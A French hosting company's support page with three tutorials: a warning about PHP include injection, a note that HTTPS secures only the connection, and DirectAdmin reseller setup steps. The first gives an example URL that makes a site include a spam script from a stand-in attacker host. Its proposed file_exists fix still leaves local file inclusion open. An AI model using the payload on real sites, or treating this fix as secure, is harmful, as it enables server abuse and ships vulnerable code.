Support AlpesHosting.com
Support

Attention aux INCLUDE dans les pages PHP

INCLUDE est une fonction sympathique en PHP  qui permet d’intégrer un fichier dans un autre.

Je peux ainsi avoir une page index.php, qui contient le gabarit de mon site web, dans laquelle je fais un include d’une page passée en paramètre, ce qui donne comme lien:
index.php?page=accueil.html
et dans ma page index.php j’aurai ce morceau de script:
include (« $page »);

Ce type de code est très pratique, mais surtout plus que dangereux.

En effet on peut ainsi appeler une page externe avec un script permettant d’envoyer du Spam par exemple, cela en mettant dans la barre d’adresse du navigateur ce type de lien:
http://monsite.tld/index.php?page=http://sitedupirate.tld/monscriptdespam.php

Ainsi un pirate utilisera le serveur sur lequel vous êtes hébergé pour envoyer du Spam (ou faire d’autres choses encore plus dangereuses) à partir de ses propres scripts hébergés n’importe ou.

Voici le moyen d’éviter ce type de piratage:
Il suffit de remplacer le code ci-dessus:  include (« $page »);
Par celui-ci:

if(file_exists($page))
{
require (« $page »);
}
else
{
include ‘mapageaccueil.html’;
}

Ce petit script qui fait aussi l’include de la page contenue dans la variable $page, teste avant l’include la présence locale du fichier que l’on demande d’afficher (if file_exists) et si le fichier n’existe pas comme dans l’exemple d’un pirate qui essayerait d’exécuter sa propre page, alors c’est une page d’accueil ou un page d’alerte qui est affichée.

Un moyen simple, mais efficace.




Site sécurisé https:// avec un certificat SSL.

On parle souvent de site sécurisé https:// avec un certificat SSL.

En fait, ce n’est pas le site qui est sécurisé, mais la connexion avec le site.

C’est à dire que si un visiteur se connecte sur la page https:// les données de la page sont cryptées depuis la sortie du serveur et ce jusqu’au navigateur du client qui va les décoder.

Si une personne intercepte les données entre deux, elle ne verra qu’un charabia impossible à exploiter. Donc, l’échange de données est sûr et protégé.

Mais,

Le https:// ne va pas sécuriser un site. Si le site a des faiblesses dans ses scripts php ou des CMS pas à jour, il peut être piraté tout aussi facilement qu’un site http:// De plus, les données stockées sur le serveur, sont en clair comme pour les sites http:// Seules les données qui transitent sur le réseau sont cryptées pendant la durée de leur transfert.




Configurer votre compte revendeur

Vous venez d’avoir vos codes d’accès et c’est maintenant à vous de jouer, et de créer les comptes de vos clients.

On peut respecter la procédure suivante:

1/ changer les DNS sur le nom de domaine du client, en mettant les vôtres qui sont sous la forme: ns0.domaine-revendeur.tld et ns1.domaine-revendeur.tld (remplacer domaine-revendeur.tld par votre nom de domaine principal).

Attention un changement de DNS peut prendre jusqu’à 48 heures pour se propager, et cela à partir du moment où votre registrar les met à jour.

2/ maintenant sous Diretc Admin, vous allez devoir créer vos packs clients, c’est-à-dire les options que vous allez appliquer à vos clients.
Si vous utiliser le skin enhanced en anglais (le seul qui est mis à jour par Direct Admin) vous aller vous rendre dans la rubrique: « Manage User Packages » puis dans « Add Package »

Complétez le formulaire, donnez un nom à votre forfait, et sauvegardez-le.
Vous venez de créer votre premier forfait client Smiley

3/ vous allez maintenant vous rendre dans la rubrique: « Add New User »
Remplissez le formulaire, appliquez un forfait à votre client, et enregistrez-le.
Direct Admin, créer votre premier client.

Astuce n°1: ne mettez pas un nom trop long à votre client, car toutes les bases de données mysql auront un nom qui commence par: loginclient_
Mysql a une limite de longueur pour les noms de base, alors plus le nom de login est long et moins votre client aura de possibilités pour nommer ses bases Mysql.

Astuce n°2: personnalisez le mail d’accueil que va recevoir votre client en cliquant sur « Edit User Message » avant de sauvegarder la configuration du client.



.: Mentions légales :: C.G.V. :: Tutoriels de Support :: Informations de maintenance :.
Tous nos prix sont en euros et Hors-Taxes. --- Copyright tous droits résevés Alpes Hosting 2006-2010